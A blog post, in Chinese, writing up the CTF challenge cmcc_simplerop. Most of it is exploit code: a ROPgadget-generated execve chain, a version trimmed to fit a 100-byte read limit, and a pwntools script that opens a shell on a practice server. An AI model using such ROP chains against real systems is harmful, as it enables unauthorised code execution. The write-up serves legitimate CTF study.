cmcc_simplerop

这题也是静态的程序，但是对比上一题多了一个限制

这个可以读取的数据只能为100所以如果用ropchain需要修改

点击查看代码

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080bae06) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080bae06) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08054250) # xor eax, eax ; ret
	p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x0806e851) # pop ecx ; pop ebx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080ea060) # padding without overwrite ebx
	p += pack('<I', 0x0806e82a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08054250) # xor eax, eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x0807b27f) # inc eax ; ret
	p += pack('<I', 0x080493e1) # int 0x80

这是系统给好的ropchain

点击查看代码

p = 'a'*32

p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '/sh\x00'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e850)
p+=p32(0)
p+=p32(0)
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x080bae06) # pop eax ; ret
p+=p32(0xb)
p += pack('<I', 0x080493e1) # int 0x80

这是我们修改后的ropchain，核心思想就是把edx,ecx,ebx改到了一起这样就可以减少很多字节的输入。附上博客 https://blog.csdn.net/Y_peak/article/details/114893593?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-2-114893593-blog-104406311.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-2-114893593-blog-104406311.pc_relevant_default&utm_relevant_index=4 这题偏移量也不对是1c 最终exp

点击查看代码

from pwn import *
from struct import pack
#io=process('./simplerop')
io=remote('node4.buuoj.cn',28306)
io.recvuntil(':')
# Padding goes here
p = 'a'*32

p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '/sh\x00'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e850)
p+=p32(0)
p+=p32(0)
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x080bae06) # pop eax ; ret
p+=p32(0xb)
p += pack('<I', 0x080493e1) # int 0x80
io.send(p)
io.interactive()
print hex(len(p))

posted @ 2022-07-02 19:09 REPWNER 阅读(6) 评论(0) 收藏举报

刷新页面返回顶部

REPWNER

cmcc_simplerop

公告